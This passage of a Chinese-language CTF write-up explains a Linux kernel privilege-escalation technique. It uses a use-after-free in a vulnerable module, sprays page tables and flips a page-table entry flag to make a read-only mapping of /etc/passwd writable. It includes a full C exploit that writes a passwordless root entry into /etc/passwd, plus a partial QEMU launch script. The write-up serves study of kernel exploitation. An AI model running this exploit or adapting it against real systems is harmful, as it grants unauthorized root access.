MAP_SHARED|MAP_FIXED, fd, <span class="hljs-number">0</span>);<br>  assert (p == q);<br>  <span class="hljs-keyword">return</span> p;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><code>PTI_TO_VIRT</code>函数接受PGD，PUD，PMD，PTE四个索引值，并将它们<code>拼接</code>成一个完整的虚拟地址</p>
<p>公式:</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">虚拟地址 = (pgd &lt;&lt; 39) | (pud &lt;&lt; 30) | (pmd &lt;&lt; 21) | (pte &lt;&lt; 12)<br></code></pre></td></tr></table></figure>

<p>ps:前置知识已总结</p>
<p>低12位默认为0，因此函数返回的是每个页表条目对应的页起始地址</p>
<p>这样构造出的虚拟地址在用户态是合法的，可用于后面的<code>mmap</code>操作，从而实现精确控制页表布局</p>
<p>而<code>mmap_file_by_pti</code>则将一个文件以<strong>只读</strong>，<strong>共享</strong>的方式，强制映射到由页表索引(pgd, pud, pmd, pte)计算出的精确虚拟地址上</p>
<p>我们选择的文件便是<code>/etc/passwd</code></p>
<p>接下来</p>
<p>我们先利用ioctl的<code>CMD_ALLOC</code>分配0x100，即256个obj，每个obj的大小为<code>0x800</code>字节，即2KB</p>
<p>一共是512KB</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">static</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">kmem_cache</span> *<span class="hljs-title">obj_cachep</span>;</span><br><br><span class="hljs-keyword">case</span> CMD_ALLOC:<br>    obj_array[arg] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);<br>    ret = <span class="hljs-number">0</span>;<br>    <span class="hljs-keyword">break</span>;<br></code></pre></td></tr></table></figure>

<p>这些obj并非直接从<strong>伙伴系统</strong>(<code>buddy system</code>)分配，而是来自内核为该模块预先创建的专用<strong>slab 缓存</strong>(<code>obj_cachep</code>)</p>
<p><strong>slab分配器</strong>负责从伙伴系统申请物理页(4KB)，然后将每个页切割成若干个大小相同的对象</p>
<p>对于2KB的obj，每个物理页可以容纳2个对象(<code>objs_per_slab = 2</code>)</p>
<p>因此，这256个obj一共占用128个物理页</p>
<p>接下来调用<code>CMD_SEL</code>选中任意一个obj</p>
<p>随后我们开始<strong>PTE spraying</strong></p>
<p>在释放所有<code>obj</code>对象之前，我们先将目标文件<code>/etc/passwd</code>的大量只读映射<code>pin</code>在虚拟地址空间中</p>
<p>并迫使内核为这些映射分配好各级页表</p>
<p>这样，当对象释放后，新分配的PTE表就能精准占据obj原本占用的物理页</p>
<p>形成精准的<strong>UAF</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> etcfd = open(<span class="hljs-string">&quot;/etc/passwd&quot;</span>, O_RDONLY);<br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> ENTRY_PER_TABLE 512</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> SPRAY_NUM 0x1800</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DELTA 0x7f8</span><br><br><span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; SPRAY_NUM / ENTRY_PER_TABLE; i++) &#123;<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> j = <span class="hljs-number">0</span>; j &lt; ENTRY_PER_TABLE; j++) &#123;<br>    mmap_file_by_pti(etcfd, <span class="hljs-number">1</span>, i, j, DELTA / <span class="hljs-number">8</span>);<br>    mmap_file_by_pti(etcfd, <span class="hljs-number">1</span>, i, j, (<span class="hljs-number">0x800</span> + DELTA) / <span class="hljs-number">8</span>);<br>  &#125;<br>  <span class="hljs-keyword">volatile</span> <span class="hljs-type">char</span> c = *PTI_TO_VIRT(<span class="hljs-number">1</span>, i, <span class="hljs-number">0</span>, DELTA / <span class="hljs-number">8</span>); <span class="hljs-comment">// Allocate PGD and PMD</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>其中<code>mmap_file_by_pti</code>使用<code>MAP_FIXED</code>将<code>/etc/passwd</code>的第一个页面(偏移0)强制映射到虚拟地址<code>PTI_TO_VIRT(1, i, j, pte_idx)</code></p>
<p>这里<code>pte_idx</code>分别为<code>DELTA/8</code>和<code>(0x800+DELTA)/8</code></p>
<p>即为255和511</p>
<p>也就是说，每个PMD条目(即每张PTE表)中，我们只映射第255号和第511号PTE，其余PTE均保持空缺</p>
<p>为什么呢?</p>
<p>后面你就懂了</p>
<p>内外两层循环</p>
<p>PGD索引固定为1</p>
<p>外层i循环遍历PUD索引(12个)，内层j循环遍历PMD索引(512个)</p>
<p>然而此时，这些<code>mmap</code>调用仅仅在进程的<strong>VMA</strong>(<code>虚拟内存区域</code>)中创建了映射记录，页表(PGD，PUD，PMD，PTE)尚未实际分配</p>
<div class="note note-danger">
            <p>内核采用<strong>惰性分配策略</strong>，直到第一次访问该地址时，才会通过缺页异常(page fault)建立真正的页表</p> 
          </div>

<p>因此</p>
<p>当执行<code>volatile char c = *PTI_TO_VIRT(1, i, 0, DELTA / 8)</code>时</p>
<p>PGD索引依旧固定为1，PMD和PTE索引则设置为0和255</p>
<p>遍历PUD索引0~11</p>
<p>此时触发了<strong>缺页异常</strong>，内核才完成了从PGD到PTE的各级页表分配，并建立了到文件缓存物理页(<code>/etc/passwd</code>)的映射</p>
<p>再引用一句原文:</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">Unlike Dirty Pagetable, here we are repeatedly mapping the same file. As a result, only a single physical memory page is allocated for the file contents. This means Dirty Pageflags consumes far less memory compared to Dirty Pagetable, which I think is another advantage.<br></code></pre></td></tr></table></figure>

<p>我们总共创建了<code>12 × 512 × 2 = 12288</code>个虚拟内存页(每个4KB)</p>
<p>但它们实际上都指向同一个物理页</p>
<p>即<code>/etc/passwd</code>的文件缓存页</p>
<p>所以从物理内存角度看，文件内容实际只占用1个物理页</p>
<p>接下来我们便可以调用<code>CMD_DELETE</code>释放所有obj</p>
<p>它们会被归还给<code>buddy system</code></p>
<div class="note note-primary">
            <p><strong>slab缓存</strong>释放对象时，并不会立即将整页返回伙伴系统，而是保留在<code>per-CPU</code>的<code>partial</code>列表中，以便快速重用</p> <p>不过，我们调用<code>CMD_DELETE</code>释放了所有对象</p> <p>当<code>slab缓存</code>中一个页上的所有对象都空闲后，该页会被标记为空闲，并最终归还给伙伴系统</p> 
          </div>

<p><strong>然而，我们现在仍然持有其中一个obj的悬垂指针(selected)</strong></p>
<p>随后</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; SPRAY_NUM / ENTRY_PER_TABLE; i++) &#123;<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> j = <span class="hljs-number">1</span>; j &lt; ENTRY_PER_TABLE; j++) &#123;<br>    <span class="hljs-keyword">volatile</span> <span class="hljs-type">char</span> c;<br>    c = *PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, DELTA / <span class="hljs-number">8</span>);<br>    c = *PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, (<span class="hljs-number">0x800</span> + DELTA) / <span class="hljs-number">8</span>);<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<div class="note note-info">
            <p>无论是四级页表中的哪一个，每个页表都是4KB，一共有512个索引</p> 
          </div>

<p>注意，内层循环的j从索引1开始，而不是0</p>
<p>PGD页表索引固定为1，早已分配，指向PUD</p>
<p>PUD中我们分配了12个索引，每个索引对应一个PMD，其中又各有512个索引</p>
<p>不过由于先前的<code>volatile char c = *PTI_TO_VIRT(1, i, 0, DELTA / 8)</code>，PUD到PMD的索引也已建立</p>
<p>唯一缺失的便是PMD到PTE的索引</p>
<p>因此执行<code>c = *PTI_TO_VIRT(1, i, j, DELTA / 8)</code>和<code>c = *PTI_TO_VIRT(1, i, j, (0x800 + DELTA) / 8)</code>时</p>
<p>内核需要从<strong>伙伴系统</strong>中分配一个4KB的物理页作为新的PTE表以建立索引</p>
<p>此时，伙伴系统中最近被释放的物理页正是之前存放<code>obj</code>的那些页面(128个4KB页，共512KB)</p>
<p>由于伙伴系统优先分配最近释放的内存，新分配的PTE表<strong>极大概率</strong>会占用原来<code>obj</code>对象所占用的物理页</p>
<p>一共触发了<code>12 × 511 × 2</code>次<code>page fault</code></p>
<p>但实际只分配了<code>12 × 511</code>张PTE表</p>
<p>因为每张表被两个不同的PTE索引共享</p>
<p>而<code>12 × 511</code>个物理页<strong>远大于</strong>释放obj获得的128个物理页</p>
<p>那么</p>
<p>这些PTE表中就必然有一个覆盖了之前obj的内存区域</p>
<p>这便是<strong>spray技术</strong>的魅力</p>
<p>而<code>selected</code>仍然指向其中的一个物理页</p>
<p>这个物理页现在已经被内核重新分配为一张PTE表</p>
<p>因此，<code>selected</code>指针实际指向了一张PTE表</p>
<p>通过<code>selected-&gt;cnt++</code>我们就能修改这张PTE表中的某个8字节条目</p>
<p>由于<code>cnt</code>在<code>obj</code>结构中的偏移为<code>0x7f8</code>，而PTE表是由512个8字节的PTE组成的数组，偏移<code>0x7f8</code>恰好对应第<code>0x7f8 / 8 = 0xff(255)</code>个PTE</p>
<p>同理</p>
<p>也可能是第511个PTE</p>
<p><strong>这便是我们先前映射文件时选择的PTE索引为255和511的原因</strong></p>
<p>现在</p>
<p>我们执行两次<code>CMD_INC</code></p>
<p>其中的一个PTE的标志位由<code>0 1</code>变为<code>1 1</code></p>
<p>这个特定的PTE建立的映射中<code>/etc/passwd</code>便变为<strong>可读可写</strong>了</p>
<p>最后，我们循环遍历所有喷射的地址，尝试向每个地址写入我们准备好的新<code>passwd</code>行</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 101 --&gt; 111</span><br><span class="hljs-type">int</span> neko = open(<span class="hljs-string">&quot;/tmp/neko&quot;</span>, O_RDWR | O_CREAT, <span class="hljs-number">0666</span>);<br>write(neko, <span class="hljs-string">&quot;root::0:0:root:/root:/bin/sh\n&quot;</span>, <span class="hljs-number">29</span>);<br><br><span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; SPRAY_NUM / ENTRY_PER_TABLE; i++) &#123;<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> j = <span class="hljs-number">1</span>; j &lt; ENTRY_PER_TABLE; j++) &#123;<br>    <span class="hljs-type">ssize_t</span> s;<br>    lseek(neko, <span class="hljs-number">0</span>, SEEK_SET);<br>    s = read(neko, PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, DELTA / <span class="hljs-number">8</span>), <span class="hljs-number">29</span>);<br>    <span class="hljs-keyword">if</span> (s &gt; <span class="hljs-number">0</span>) <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;wow: %ld, %ld\n&quot;</span>, i, j);<br><br>    lseek(neko, <span class="hljs-number">0</span>, SEEK_SET);<br>    read(neko, PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, (<span class="hljs-number">0x800</span> + DELTA) / <span class="hljs-number">8</span>), <span class="hljs-number">29</span>);<br>    <span class="hljs-keyword">if</span> (s &gt; <span class="hljs-number">0</span>) <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;wow: %ld, %ld (2)\n&quot;</span>, i, j);<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>最终，必定会有一个地址被成功修改</p>
<p>当程序退出且所有文件描述符被关闭时，被修改的文件会设置其<code>Dirty</code>标志</p>
<p>因此，Linux内核会将修改后的内容写回磁盘，从而有效地覆盖原本是<strong>只读</strong>的<code>/etc/passwd</code>文件</p>
<p>这里为什么用<strong>read系统调用</strong>呢?</p>
<p>依旧引用一下原文</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">In some cases like use-after-free, however, we don&#x27;t know which entry is modified. Writing to an unmodified entry will result in SIGSEGV because it does not have R/W flag set. To resolve this issue, we can use syscall to write to the memory because simply return -1 when it tried to write a read-only mapping, instead of crashing.<br></code></pre></td></tr></table></figure>

<h3 id="总结与exp"><a href="#总结与exp" class="headerlink" title="总结与exp"></a>总结与exp</h3><p>最后，给出完整exp</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">define</span> _GNU_SOURCE</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;assert.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sched.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/ioctl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/mman.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_ALLOC   0x0268</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_INC     0x0298</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_SEL     0x01c1</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CMD_DELETE  0x0831</span><br><br><span class="hljs-type">static</span> <span class="hljs-type">void</span> <span class="hljs-title function_">fatal</span><span class="hljs-params">(<span class="hljs-type">const</span> <span class="hljs-type">char</span> *s)</span> &#123;<br>  perror(s);<br>  <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>&#125;<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">pin_cpu</span><span class="hljs-params">(<span class="hljs-type">int</span> cpu)</span> &#123;<br>  <span class="hljs-type">cpu_set_t</span> <span class="hljs-built_in">set</span>;<br>  CPU_ZERO(&amp;<span class="hljs-built_in">set</span>);<br>  CPU_SET(cpu, &amp;<span class="hljs-built_in">set</span>);<br>  <span class="hljs-keyword">if</span> (sched_setaffinity(<span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(<span class="hljs-type">cpu_set_t</span>), &amp;<span class="hljs-built_in">set</span>))<br>    fatal(<span class="hljs-string">&quot;sched_setaffinity&quot;</span>);<br>&#125;<br><br><span class="hljs-type">int</span> fd;<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">module_alloc</span> <span class="hljs-params">(<span class="hljs-type">size_t</span> index)</span> &#123; <span class="hljs-keyword">return</span> ioctl(fd, CMD_ALLOC , index); &#125;<br><span class="hljs-type">int</span> <span class="hljs-title function_">module_inc</span><span class="hljs-params">()</span> &#123; <span class="hljs-keyword">return</span> ioctl(fd, CMD_INC, <span class="hljs-number">0</span>); &#125;<br><span class="hljs-type">int</span> <span class="hljs-title function_">module_sel</span><span class="hljs-params">(<span class="hljs-type">size_t</span> index)</span> &#123; <span class="hljs-keyword">return</span> ioctl(fd, CMD_SEL, index); &#125;<br><span class="hljs-type">int</span> <span class="hljs-title function_">module_delete</span><span class="hljs-params">(<span class="hljs-type">size_t</span> index)</span> &#123; <span class="hljs-keyword">return</span> ioctl(fd, CMD_DELETE, index); &#125;<br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> MAX_OBJ_NUM 0x100</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> OBJ_SIZE    0x800</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> OBJS_PER_SLAB 8    <span class="hljs-comment">// /sys/kernel/slab/obj/objs_per_slab</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> CPU_PARTIAL   24   <span class="hljs-comment">// /sys/kernel/slab/obj/cpu_partial</span></span><br><br><span class="hljs-type">char</span>* <span class="hljs-title function_">PTI_TO_VIRT</span><span class="hljs-params">(<span class="hljs-type">size_t</span> pgd, <span class="hljs-type">size_t</span> pud, <span class="hljs-type">size_t</span> pmd, <span class="hljs-type">size_t</span> pte)</span> &#123;<br>  assert (pgd &lt; <span class="hljs-number">0x200</span> &amp;&amp; pud &lt; <span class="hljs-number">0x200</span> &amp;&amp; pmd &lt; <span class="hljs-number">0x200</span> &amp;&amp; pte &lt; <span class="hljs-number">0x200</span>);<br>  <span class="hljs-keyword">return</span> (<span class="hljs-type">void</span>*)((pgd &lt;&lt; <span class="hljs-number">39</span>) + (pud &lt;&lt; <span class="hljs-number">30</span>) + (pmd &lt;&lt; <span class="hljs-number">21</span>) + (pte &lt;&lt; <span class="hljs-number">12</span>));<br>&#125;<br><br><span class="hljs-type">void</span>* <span class="hljs-title function_">mmap_by_pti</span><span class="hljs-params">(<span class="hljs-type">size_t</span> pgd, <span class="hljs-type">size_t</span> pud, <span class="hljs-type">size_t</span> pmd, <span class="hljs-type">size_t</span> pte)</span> &#123;<br>  <span class="hljs-type">void</span> *p = (<span class="hljs-type">void</span>*)PTI_TO_VIRT(pgd, pud, pmd, pte);<br>  <span class="hljs-type">void</span> *q = mmap(p, <span class="hljs-number">0x1000</span>, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED|MAP_FIXED, <span class="hljs-number">-1</span>, <span class="hljs-number">0</span>);<br>  assert (p == q);<br>  <span class="hljs-keyword">return</span> p;<br>&#125;<br><br><span class="hljs-type">void</span>* <span class="hljs-title function_">mmap_file_by_pti</span><span class="hljs-params">(<span class="hljs-type">int</span> fd, <span class="hljs-type">size_t</span> pgd, <span class="hljs-type">size_t</span> pud, <span class="hljs-type">size_t</span> pmd, <span class="hljs-type">size_t</span> pte)</span> &#123;<br>  <span class="hljs-type">void</span> *p = (<span class="hljs-type">void</span>*)PTI_TO_VIRT(pgd, pud, pmd, pte);<br>  <span class="hljs-type">void</span> *q = mmap(p, <span class="hljs-number">0x1000</span>, PROT_READ, MAP_SHARED|MAP_FIXED, fd, <span class="hljs-number">0</span>);<br>  assert (p == q);<br>  <span class="hljs-keyword">return</span> p;<br>&#125;<br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> ENTRY_PER_TABLE 512</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> SPRAY_NUM 0x1800</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DELTA 0x7f8</span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> &#123;<br>  <span class="hljs-type">int</span> etcfd = open(<span class="hljs-string">&quot;/etc/passwd&quot;</span>, O_RDONLY);<br>  <span class="hljs-keyword">if</span> (etcfd == <span class="hljs-number">-1</span>) fatal(<span class="hljs-string">&quot;/etc/passwd&quot;</span>);<br><br>  fd = open(<span class="hljs-string">&quot;/dev/vuln&quot;</span>, O_RDWR);<br>  <span class="hljs-keyword">if</span> (fd == <span class="hljs-number">-1</span>) fatal(<span class="hljs-string">&quot;/dev/vuln&quot;</span>);<br><br>  pin_cpu(<span class="hljs-number">0</span>);<br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Spraying objects...&quot;</span>);<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; MAX_OBJ_NUM; i++)<br>    <span class="hljs-keyword">if</span> (module_alloc(i % MAX_OBJ_NUM) != <span class="hljs-number">0</span>)<br>      fatal(<span class="hljs-string">&quot;module_alloc&quot;</span>);<br><br>  <span class="hljs-keyword">if</span> (module_sel(<span class="hljs-number">50</span>) != <span class="hljs-number">0</span>)<br>    fatal(<span class="hljs-string">&quot;module_sel&quot;</span>);<br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Preparing pages...&quot;</span>);<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; SPRAY_NUM / ENTRY_PER_TABLE; i++) &#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> j = <span class="hljs-number">0</span>; j &lt; ENTRY_PER_TABLE; j++) &#123;<br>      mmap_file_by_pti(etcfd, <span class="hljs-number">1</span>, i, j, DELTA / <span class="hljs-number">8</span>);<br>      mmap_file_by_pti(etcfd, <span class="hljs-number">1</span>, i, j, (<span class="hljs-number">0x800</span> + DELTA) / <span class="hljs-number">8</span>);<br>    &#125;<br>    <span class="hljs-keyword">volatile</span> <span class="hljs-type">char</span> c = *PTI_TO_VIRT(<span class="hljs-number">1</span>, i, <span class="hljs-number">0</span>, DELTA / <span class="hljs-number">8</span>);<br>  &#125;<br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Returning page to buddy allocator&quot;</span>);<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; MAX_OBJ_NUM; i++)<br>    <span class="hljs-keyword">if</span> (module_delete(i) != <span class="hljs-number">0</span>)<br>      fatal(<span class="hljs-string">&quot;module_delete&quot;</span>);<br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;[+] Spraying PTEs...&quot;</span>);<br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; SPRAY_NUM / ENTRY_PER_TABLE; i++) &#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> j = <span class="hljs-number">1</span>; j &lt; ENTRY_PER_TABLE; j++) &#123;<br>      <span class="hljs-keyword">volatile</span> <span class="hljs-type">char</span> c;<br>      c = *PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, DELTA / <span class="hljs-number">8</span>);<br>      c = *PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, (<span class="hljs-number">0x800</span> + DELTA) / <span class="hljs-number">8</span>);<br>    &#125;<br>  &#125;<br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Go&quot;</span>);<br>  <span class="hljs-keyword">if</span> (module_inc() != <span class="hljs-number">0</span>)<br>    fatal(<span class="hljs-string">&quot;module_inc&quot;</span>);<br>  <span class="hljs-keyword">if</span> (module_inc() != <span class="hljs-number">0</span>)<br>    fatal(<span class="hljs-string">&quot;module_inc&quot;</span>);<br><br>  <span class="hljs-comment">// 101 --&gt; 111</span><br>  <span class="hljs-type">int</span> neko = open(<span class="hljs-string">&quot;/tmp/neko&quot;</span>, O_RDWR | O_CREAT, <span class="hljs-number">0666</span>);<br>  write(neko, <span class="hljs-string">&quot;root::0:0:root:/root:/bin/sh\n&quot;</span>, <span class="hljs-number">29</span>);<br>  <br>  <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i &lt; SPRAY_NUM / ENTRY_PER_TABLE; i++) &#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> j = <span class="hljs-number">1</span>; j &lt; ENTRY_PER_TABLE; j++) &#123;<br>      <span class="hljs-type">ssize_t</span> s;<br>      lseek(neko, <span class="hljs-number">0</span>, SEEK_SET);<br>      s = read(neko, PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, DELTA / <span class="hljs-number">8</span>), <span class="hljs-number">29</span>);<br>      <span class="hljs-keyword">if</span> (s &gt; <span class="hljs-number">0</span>) <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;wow: %ld, %ld\n&quot;</span>, i, j);<br><br>      lseek(neko, <span class="hljs-number">0</span>, SEEK_SET);<br>      read(neko, PTI_TO_VIRT(<span class="hljs-number">1</span>, i, j, (<span class="hljs-number">0x800</span> + DELTA) / <span class="hljs-number">8</span>), <span class="hljs-number">29</span>);<br>      <span class="hljs-keyword">if</span> (s &gt; <span class="hljs-number">0</span>) <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;wow: %ld, %ld (2)\n&quot;</span>, i, j);<br>    &#125;<br>  &#125;<br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;What&#x27;s up?&quot;</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>不同的是，这次给的<code>rootfs.zip</code>解压后是<code>rootfs.ext4</code></p>
<p>下面是run脚本:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-meta">#!/bin/sh</span><br>qemu-img create -f qcow2 -b <span class="hljs-string">&quot;<span class="hljs-subst">$(realpath rootfs.ext4)</span>&quot;</span> -F raw /tmp/overlay.qcow2 &gt;/dev/null<br><span class="hljs-built_in">cp</span> flag.txt /tmp/flag.txt &amp;&amp; <span class="hljs-built_in">chmod</span> 666 /tmp/flag.txt<br><br>qemu-system-x86_64 \<br>    -m 64M \<br>    -nographic \<br>    -kernel bzImage \<br>    -drive file=/tmp/overlay.qcow2,format=qcow2,index=0 \<br>    -drive file=/tmp/flag.txt,format=raw,index=1 \<br>    -append <span class="hljs-string">&quot;root=/dev/sda console=ttyS0 loglevel=3 oops=panic panic=-1 slab_nomerge 